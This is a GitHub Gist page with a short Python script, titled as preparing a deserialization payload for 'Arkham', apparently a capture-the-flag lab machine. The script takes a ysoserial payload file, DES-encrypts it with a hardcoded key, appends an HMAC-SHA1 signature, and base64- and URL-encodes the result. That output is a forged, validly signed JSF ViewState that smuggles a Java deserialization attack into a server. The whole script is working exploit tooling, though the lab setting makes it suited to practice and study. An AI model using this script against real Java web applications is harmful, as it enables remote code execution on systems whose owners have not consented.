-
-
Save xct/03d21af76686b549ec0639e6e7d57f22 to your computer and use it in GitHub Desktop.
Arkham - prepare deserialization payload: des encrypt, hmac sha1, base64, url encode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import hashlib | |
import hmac | |
import base64 | |
import sys | |
import urllib.parse | |
from pyDes import * | |
key = bytes("JsF9876-",'utf-8') | |
def encrypt(data, key): | |
cipher = des(key, ECB, IV=None, pad=None, padmode=PAD_PKCS5) | |
enc = cipher.encrypt(data) | |
sig = hmac.new(key, enc, hashlib.sha1).digest() | |
return enc+sig | |
if __name__ == "__main__": | |
if len(sys.argv) != 2: | |
print("Usage: python3 arkham.py <ysoerial_payload>") | |
filename = sys.argv[1] | |
with open(filename, "rb") as f: | |
data = f.read() | |
payload = encrypt(data, key) | |
payload = base64.b64encode(payload) | |
payload = payload.decode('utf-8') | |
payload = urllib.parse.quote_plus(payload) | |
print(payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment